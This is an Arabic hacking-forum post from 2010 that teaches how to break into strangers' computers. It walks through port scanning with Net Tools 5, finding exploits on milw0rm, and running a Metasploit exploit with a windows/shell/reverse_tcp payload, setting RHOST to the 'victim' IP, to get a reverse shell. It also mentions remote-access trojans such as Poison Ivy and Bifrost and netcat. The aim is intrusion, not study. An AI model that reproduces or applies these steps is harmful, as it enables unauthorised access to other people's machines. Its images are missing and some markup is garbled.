الموضوع: للعنكبوتة اخترق بمجرد الاستهداف ناجحة 100 % شرح بالصور
عرض مشاركة واحدة
قديم 06-11-2010, 01:04 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
dahapp
 
الصورة الرمزية dahapp
 

 
 
إحصائية العضو





dahapp غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dahapp is on a distinguished road
.................... للعنكبوتة اخترق بمجرد الاستهداف ناجحة 100 % شرح بالصور

[align=center][]

الســــــــــــــــلام عليكم ورحمـــــــــــــــة الله وبركاته
كيف حال الشباب
عملت شرح بالصور عن كيفية اختراق اي جهاز بالبورتات المفتوحه فيه طبعا اغلب الناس لما يفحصو الاي بي يفحصوه من البورت
1 الى البورت 1024
وهذا خطأ
البورتات اللتي قد تكون مفتوحه بتكون من البورت 1 الى 65535
بس رح يطول حتى يفحصه كله فالحل الامثل للفحص السريع هو برنامج
net tools 5
واظن اغلبكم يعرفه ها البرنامج يحتوي على برامج ضخمة جدا مثل الميتا لما يحتوي على ثغرات هذا البرنامج يحتوي على ادوات يحتاجها كل هكر وتساعدنا في كل اختراقاتنا للمواقع او الاجهزة لتحميل البرنامج

كود:
http://www.softpedia.com/get/Network...ools.shtmlوهذه صورة له مع بعض الادوات








الان في اكثر من port scanner
نروح نختار من
network tools
super fast port scanner and port scanner
شوفو معي الصورة




الان في فرق طبعا بين الاثنين ولكن يفضل فحص الاي بي المستهدف بالبرنامجين
super fast port scanner
سريع جدا ولكنه غير دقيق ومع هذا يفي بالغرض في كشف البورتات المفتوحه الكبيرة
port scanner
بطيء ولكنه دقيق جدا واسرع من غيره واكثر دقه من البرامج الفحص الخارجية
الان بعد ماعرفنا البورتات المفتوحه الصغيرة سواء او الكبيرة
نذهب الى
http://www.milw0rm.com/port.php
وهذا مفيد جدا جدا جدا في معرفة البرامج المركبة على البورتات مثلا شفنا احنا
البورت 3050 مفتوح
نختاره من القائمة مثل الصورة

[][/]
ونختار الثغرة ونحفظها على حسب برمجه كتابتها وطلعت بالبيرل

[/][/URL
]


والكل أظن يعرف يستبدل الشل كود وكيفية استغلال الثغرة جربت البرنامجين وما زبطو طبعا لانه الجهاز اللي فحصته اكس بي والبورت هذا كان
على لينكس
نجرب بورت مثلا من البورتات الصغار 135 وفي العشرات من البورتات الا ماتلقا واحد تخترق جهاز الضحية عن طريقه وانا اأكلدكم انه 95% من الاجهزة اللي رح تستهدفها رح تخترقها اذا شديت حيلك بهذه الطريقة
الان نشوف الصورة


طيب حلو بس ليش بدال مانتعب نفسنا وندور على ثغرة برنامج RPD
في الملورم ونحفظ الثغرة وننزل برنامج المترجم ونبدل الشل كود ووووو
خلونا ندور على الميتاسبلوت :D ويفضل تحديثه قبل البحث
نختار exploits اللي فوق
بعدين نحط في search box
اي برنامج من البرامج المركبة على بورت 135 اللي لقيناه في الموروم


حلو الان نفتحه ونطلع الثغرة وننسخها
ونفتح
Consle اللي في الميتاسبلوت
ونكتب
use واسم الثغرة شوفو معي الصورة


set payload
لتحديد الاستغلال وانا رح حدد استغلال
windows/شلl/reverse_tcp
set RHOST اي بي الضحية
set LHOST الاي بي تبعك
set RPORT خليه مثل ماهو لانه هو البورت اللي لقيناه مفتوح للضحية وهو بورت الثغرة الاصلي
set LPORT هنا نحط اي بورت مفتوح بالمودم عشان يجي عليه التبليغ ولازم يكون البورت مو شغال يعني متنصت عليه بالبويزن او البيفروست او سباي نت
ولتشغيل الثغرة نحط
exploit


وهاقد تم الاختراق عن طريق الاتصال العكسي كما قلنا
windows/شلl/reverse_tcp
ولكن انا افضل النيت كات
وكذا طبقنا على بورت واحد بدنا نشوف شروحاتكم على البورتات الكبرى والاخرى اللي مانشرحت من قبل وكل واحد يلاقي ثغرة برنامج على بورت 8080 يسدح رابط الثغرة او الكود لانه اكتشفت انه اغلب اجهزتنا او كلها مفتوح فيها بورت 8080


تحياتى للشبكة العنكبوتية مصدر علمى ومعرفتى وتحياتى لاعضاء المنتدى الكرام وان شاء الله نشوف الاعضاء بانجازات اكبر
تحياتى غ ـمزة هآكرز
للمراسلة
dahap@rocketmail.com a012 smilies18[/align]



gguk;f,jm hojvr fl[v] hghsji]ht kh[pm 100 % avp fhgw,v